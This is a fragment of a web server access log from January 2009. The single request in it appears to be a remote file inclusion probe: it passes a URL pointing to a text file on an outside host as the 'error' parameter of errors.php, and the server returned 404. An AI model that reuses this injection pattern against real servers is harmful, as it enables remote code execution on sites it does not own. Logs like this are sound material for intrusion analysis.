119.205.209.69 - - [06/Jan/2009:09:55:21 -0800] "GET /logs/access_080804.log/errors.php?error=http://www.stormpages.com/wongdan/scan.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.co